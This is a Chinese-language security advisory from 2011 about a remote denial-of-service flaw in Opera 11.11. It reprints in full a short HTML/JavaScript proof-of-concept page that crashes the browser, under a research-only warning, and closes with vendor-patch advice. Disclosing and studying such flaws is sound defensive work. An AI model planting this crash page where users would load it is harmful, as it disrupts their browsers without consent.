Opera Web Browser 11.11拒绝服务漏洞
发布日期:2011-06-14
更新日期:2011-06-14
受影响系统:Opera Software Opera Web Browser 11.11
描述:
BUGTRAQ ID:
48262
Opera为来自挪威的一个极为出色的浏览器,具有速度快、节省系统 资源、订制能力强、安全性高以及体积小等特点,目前已经是最受欢迎的浏览器之一。
Opera Web Browser 11.11在实现上存在拒绝服务漏洞,远程攻击者可利用此漏洞使受影响应用程序崩溃,拒绝服务合法用户。
<*来源:echo
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<html>
<body>
<iframe src='about:blank' id='bo0om' style="width:0px;height:0px;border:0px none;"></iframe>
<script type="text/javascript" language="javascript">
/*
*
* Opera 11.11 Remote Crash
* Software link:
http://www.opera.com/download/
* Tested on: Win32 xp home sp 3
* CVE : null
*
* Im too lazy to deep analyze this ,but i thing is just unexploitable crash
* so f****jixvt
* ( dla klechis�awa i jego kosiarki :i )
*
*/
var a = window.document.getElementById('bo0om');
var b = a.contentDocument.createElement('font');
a.src='about:blank';
setTimeout('b.face = "h3h";',500);
</script>
</body>
</html>
建议:
厂商补丁:
Opera Software
--------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.opera.com/support/浏览次数:1982
严重程度:0(网友投票)
